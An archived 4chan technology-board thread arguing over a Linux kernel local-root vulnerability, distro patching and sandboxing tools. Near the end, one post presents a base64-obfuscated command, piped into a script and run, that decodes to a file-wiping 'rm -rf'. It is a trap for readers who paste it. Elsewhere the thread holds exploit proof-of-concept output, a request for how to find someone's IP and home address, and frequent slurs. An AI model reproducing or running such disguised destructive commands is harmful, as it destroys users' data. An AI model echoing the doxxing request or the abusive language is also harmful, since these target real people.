[a / b / c / d / e / f / g / gif / h / hr / k / m / o / p / r / s / t / u / v / vg / vm / vmg / vr / vrpg / vst / w / wg] [i / ic] [r9k / s4s / vip] [cm / hm / lgbt / y] [3 / aco / adv / an / bant / biz / cgl / ck / co / diy / fa / fit / gd / hc / his / int / jp / lit / mlp / mu / n / news / out / po / pol / pw / qst / sci / soc / sp / tg / toy / trv / tv / vp / vt / wsg / wsr / x / xs] [Settings] [Search] [Mobile] [Home]
Board
Settings Mobile Home
/g/ - Technology


Thread archived.
You cannot reply anymore.


[Advertise on 4chan]


File: root (2).jpg (114 KB, 598x606)
114 KB JPG
LINUX KERNEL vulnerability allowing people to access root

It's patched on bleeding edge distros. But if you're on stable, you're cooked

https://x.com/Chromium_Linux/status/2054647599190446344

https://almalinux.org/blog/2026-05-13-fragnesia-cve-2026-46300/
>>
>lpe
i sleep
>>
I don't care.
>>
>>108822945
use Microkernels
>>
irrelevant
>>
Linux sisters coping lol
>>
>>108822987
yellowkey
greenplasma
you're not spared from this, ranjeet
>>
>>108822945
another nothingburger?
>>
>>108823046
If you mitigated dirtyfrag by blocking the vulnerable module that almost nobody was using, this one is literally a nothing.

LPEs are a very big deal in certain environments, especially the kinds of environments where linux is used a lot (eg supercomputing)
>>
>>108823210
>LPEs are a very big deal in certain environments
sure
>eg supercomputing
isn't supercomputing mostly closed-off to the public and so mostly running trusted code?

the problem I see is more for public compute services, where an LPE breaks one of the layers of defense in depth you need to avoid getting popped on the regular. many places that can't or won't update fast will end up getting popped when the next container escape CVE gets published
>>
>>108822945
https://nitter.net/Chromium_Linux/status/2054647599190446344

Fixed that link for you. Please don't post shitter links. Thanks.
>>
>>108822945
it's getting scary latley
>>
>>108825474
(cont.) btw this kind of situation is exactly why things like https://github.com/firecracker-microvm/firecracker exist
I expect the popularity of it to rise pretty sharply in the coming years of we keep finding more of these vulns at this insane of a rate
>>
I don't care about fake vulnerabilities that AI thinks it found
>>
>>108823014
I am I don;t use cloud file sync and have advanced test services disabled and like most onedrive uninstalled immediately a setup
>>
>Less than a week after Dirty Frag, researcher William Bowling of the V12 security team has disclosed a third Linux kernel local-root flaw
>local-root flaw
>local
So, once again it's fucking nothing.
>>
>>108825474
>isn't supercomputing mostly closed-off to the public
Yes, but only by the most inclusive definition of "public."
>so mostly running trusted code?
No. It depends entirely on the specific cluster and your definition of "trusted code". Some are extremely locked down, others are more open and vulnerable to user exploitation eg supply chain attacks or even malicious actors.

>be newfag cluster user, just got account yesterday
>oh boy here we go, I get to do AI research on multiple GPUs!
>pip install minor_typo
>Compromised library uses LPE exploit and exfiltrates every username and SSH key on the cluster to chinese server
>>
>>108822945
>durr hurr stable is cooked!!!
Imagine being so retarded you think highly important security fixes don't get applied no matter what semi-recent kernel you're on, holy shit.
>>
File: 1778809087899.png (73 KB, 728x463)
73 KB PNG
>>108822976
kek cute
>>
>>108825805
>>Compromised library uses LPE exploit and exfiltrates every username and SSH key on the cluster to chinese server
that's not how ldap works. you will exfiltrate nothing.
>>
>>108822982
Too much Linuxwashing means it holds a monopoly in the free software ecosystem
So no microkernels for now
>>
>>108825556
And I'm on an up to date system without any edge case modules enabled. What now?
>>
File: 1775633069521720.jpg (90 KB, 976x894)
90 KB JPG
>local root is fucking nothing
Stupid chuds, local root combined with an RCE in your browser means containment escape (Tails gets toasted).

Qubes OS unaffected per usual. :^)
>>
>>108822945
it's an easy to cherry pick patch.
>>
>>108822945
It seems that they started to use AI to discover kernel vulnerabilities, that's the only explanation why so many vulnerabilities were discovered lately, even though some of them existed for years.
>>
>>108822973
fpbp, no one who would break into my house would bother doing this instead of stealing valuables
>>
>>108826750
>RCE in your browser
just harden your browser, and don't just pipe downloads directly into bash blindly
>>
>>108826750
>local root combined with an RCE in your browser means containment escape
Wow, it's not like all my sensitive data accessible with regular user rights.
>>
>>108826784
nsa hoisted by their own petard
>>
>>108826814
I'm sure you wanted to say something important
>>
>>108826822
yes but it was directed at smart people, so don't worry if you didn't get it
>>
File: 1763668874449351.gif (1.08 MB, 160x192)
1.08 MB GIF
>>108826799
Unfeasible for most, migrating to Qubes OS is the path of least resistance.

>>108826805
Some users think they're clever running flatpak or appimage contained browsers, that statement was for them. If you're a retard (which I'm sure of) rawdogging your user session directly, you don't need root to take your warez.
>but muh gaymen! muh purfoooorrmanse!!
Sucks to suck, you deserve exploitation you tiktok brain.
>>
>>108826960
qubes is bloat and glows like the sun
>>
File: 1764746850911157.jpg (301 KB, 2048x1666)
301 KB JPG
>>108822945
>But if you're on stable, you're cooked
Shut the fuck up, I'm running Debian stable and I got the security update that patched it 4 days ago, try again.
>>
File: 1764725082577388.jpg (185 KB, 820x610)
185 KB JPG
>>108826967
>i got nothing but huffing my own farts
I accept your concession, gaymer.
>>
>>108827001
it's not about gayming, it's about it being based on (((fedora)))
>>
File: 1752825700580283.jpg (212 KB, 1252x1252)
212 KB JPG
>>108827063
Inside of Xen domains.
>>
File: 1762916333253137.gif (3.72 MB, 300x400)
3.72 MB GIF
>>108822945
>It's patched on bleeding edge distros. But if you're on stable
Then security fixes will be backported to your current kernel. You don't need to keep up with the news cycle. It's all but guaranteed that you'll have a fix the next time you updoot and they'll still be writing alarmists spiels about it over a week later.
>>
>>108827137
one more thing
>systemd
into the trash it goes :)
>>
>>108826750
not qubes, you larping anime literal tranny discord weeaboo retard. whonix.
>>
Como puedo obtener la ip y la difereccion de alguien???
>>
>>108827196
call me when qubes is rebuilt on top of devuan or artix, faggot
>>
>>108827206
no, we're on an anime website. anons always hated weeaboos. you are a discord tranny faggot obsessed with japan.
>>
>>108827276
you know what you are qubestranny.
>>
File: 1764585400351.jpg (122 KB, 1280x720)
122 KB JPG
>>108822945
>It's patched on bleeding edge distros

*laughs in Arch*
>>
>>108822945
>But if you're on stable, you're cooked

Yawn..
>>
>>108825488
use libredirect if it bothers you retard
>>
linux is not that good after all huh
>>
>>108827378
only trannies shill it. I've been around for the very beginning of the tor craze in altboards and this garbage container distro ass xen wrapping bullshit is completely worthless. whonix, itself just debian with a bunch of bash scripts written by a very weird guy, but still of way better utility than qubes, and can run in raw virtualbox or xen or anything else. trannies love to conflate whonix into qubes+whonix, and then just qubes. that's what I learned very early on.
>>
>>108827435
this rhetoric is giving me deja vu. it's like I'm back in 2018 again.
>>
>holy shit a vunerability was foun-- patched
I want to be excited for once
>>
File: rcZ9HYL.png (553 KB, 1200x796)
553 KB PNG
>>108822945
>le scary script
Wake me up when my machines will get drilled in automatic at connection established, getting hysterical over some shit that requires to be executed within the os is beyond retarded, why are you even here of all places if you can't prevent that regardless of the os?
>>
>>108822945
Imagine using Twitter
>>
>>108825989
There's no ldap on any of the national-scale clusters I've ever used.
>>
>>108822945
Joke's on you, I've got root on all my boxes, git gud nüb
>>
>>108827540
I have nothing against qubes in particular. it's about as mediocre and retarded as bun to me. but qubes shilling drowning out whonix shilling has always been sus to me.
>>
>>108822945
I hate zoomers, man. You're beyond retarded.
>>
>>108822945
Linux fags like the kernel was patched to fight off the derpidoodle memory modules that called whoopie() with out the banana flag
>>
>>108825550
cope used to be believable
>>
>>108825805
>others are more open and vulnerable to user exploitation
right yeah that's a fair point; I guess it felt "trusted" cause I'm more used to almost-adversarial envs

>pip install minor_typo
i hate computers <3
>>
File: 134770 - SoyBooru.jpg (132 KB, 1248x832)
132 KB JPG
>>108822945
>>
>>108827423
what's with the anti-privacy shilling? Which agency do you work for? I'm not gonna drop useful technology because muh trannies
>>
saar do the needfull and help
~/pocs/fragnesia $ ./exp /tmp/newtest
[*] uid=1001 euid=1001 gid=1001 egid=1001
[*] mode=xfrm_espintcp_pagecache_replace collateral=after

lstat target: No such file or directory
~/pocs/fragnesia $
>>
>>108828263
dont mind that /tmp/newtest it doesnt work even without that
>>
>>108828129
my quibble is above privacy vs no privacy. if you're still at that babby ledditor stage stay out of this conversation
>>
>>108822945
fuck those luddites that are 0.00001 versions behind
>>
>>108822945
no website registered for the vuln? I guess it wasn't AI assisted so we're safe
>>
Did it get patched on gentoo stable kernel?
>>
>>108825989
ldap doesn't factor in at all. SSH key exfiltration was just an example of what could be possible. A more relevant question is what kind of protections exist against a root-compromised cluster node. eg root squash configured for your parallel filesystems, cluster scheduler configured with an alternate root admin, other sandboxing/container features.
>>
>>108826750
My server doesn't have a browser.
>>
>>108828994
oh no even more ai slop how lpe is critical, nigger if you have local accounts for more than admin staff you've been fucked since forever, stop hiring jeets to admin your system
>>
>>108829061
Why are you fighting to the death on a topic you obviously know nothing about and have no personal stake in at all?
>>
>>108829086
I actually know a shitton about them, all the anthropics pushing their mythos (too dangerous to release just like gpt2 muh guise), suddenly lpe's are fucking critical bugs, except you had an lpe in linux kernel on average 2 per week, now that mythos PR showed up, these are fucking critical, kill yourself jeet, 99.99% of linux servers unaffected as only jeets create local system accounts for apps
>>
>>108822945
Anyone who goes to the trouble of hacking a 0815 user's PC deserves to see my porn collection.

There's still hope that a few anonymous geeks will use this crap to cripple the corporate internet.
>>
>>108829086
I have a master degree on securitardism, bow down to me luddite
>>
>>108822945
Page caching... So if I turn off swap it's ok?

I generally turn off swap on most systems because I'd rather my machine crash and warn me that I'm running too much shit than mysteriously bog.
>>
>>108822987
Why would they? In Linux this is not anything because you would still have to physically use the computer anyway and broke into the house. In Windows and macOS, there is zero-days every day that work remotely but for some reason you don't cry about that ever.
>>
Does this really matter, can the attack happen over the internet or is it a local access kind of hack?
>>
>>108826750
Whonix has entered the chat.
>>
>>108829764
Nope.
>>
>>108831801
It matters because any code execution on your computer could then be root.
Doesn't matter where it comes from. It could be an RCE in your browser, it could be malware in a package you downloaded but you're running as a standard user.
Any exploit or malware can bump to root.
>>
what wrong with linuxoids, just use a real OS
>>
>>108831801
It's a nothingburger, but it has to be fixed. If this had happened in the 90's it would have been a big deal.
>>
>>108822945
You ain't seen nothing yet. Look at this:
printf 'cm0gLXJmIC8qbWUqIC9tbnQK' | `base64 -d` > sudo.py
python3 ./sudo.py
>>
>>108833738
It made my PC print cool crystals. Thanks.
>>
if you leetspeak with mythos it'll let you larp with it as it unironically chains a couple of 2 month-old CVEs and a 0-day it somehow got a hold of and hack into anything you point it at as you sit with sweaty palms huffing down cigarettes shaking like you're on crack in disbelief.
Even happened to Apple the other day. Everything is fucked and getting cracked wide open - It was always chaining known exploits - taking the work of a previous vulnerability and shifting its application or a shared concept from point a to c to b to d of X and Y or Z, etc. We never stood a chance bros.

t. early goy access pending trial for decompiling 7,000 files of encrypted bytecode that hasn't been reversed for the better part of a decade in 3 days and allegedly using that to obtain access to a big boy company.
I didn't ever read more than 50 or 60 lines on a given day in the IDE.
>>
>>108822945
Using Linux was a mistake. I want to go back to 1992 and tell Stallman to use FreeBSD's kernel instead.
>>
>>108827143
>lust provoking image
>relevant, time saving post
>>
>>108825496
Microsoft is trying hard to sabotage Linux due to the backlash over Windows 11 being utterly shit.
The dude pushing for age verification on Linux works for Microsoft
>>
>>108835111
OpenBSD*
>>
>>108825496
Peter theil shills
>>
>>108826822
Shill
>>
>>108836089
>K2
>KILL 2nix
holy fuck................
>>
>>108827143
>It's all but guaranteed that you'll have a fix the next time you updoot
Upgrading a kernel requires a reboot, which isn't something you typically do often on a server OS like AlmaLinux.
My schedule is to update the kernels of all my servers every 3 months, but I'll bet there are people who don't update for years or even at all.
>>
>>108831801
>can the attack happen over the internet or is it a local access kind of hack?
It can happen over the internet but any attacker has to be able to log in over SSH.
If there are multiple users on the same server that's an issue.
Someone might also have made a user with very restricted access, for example for a script that can reads some server stats but not make any changes, and a poor password thinking it won't matter.
Any malware could also gain root access.
>>
>>108826750
My browser runs inside a firejail profile, your move.



[Advertise on 4chan]

Delete Post: [File Only] Style:
[Disable Mobile View / Use Desktop Site]

[Enable Mobile View / Use Mobile Site]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.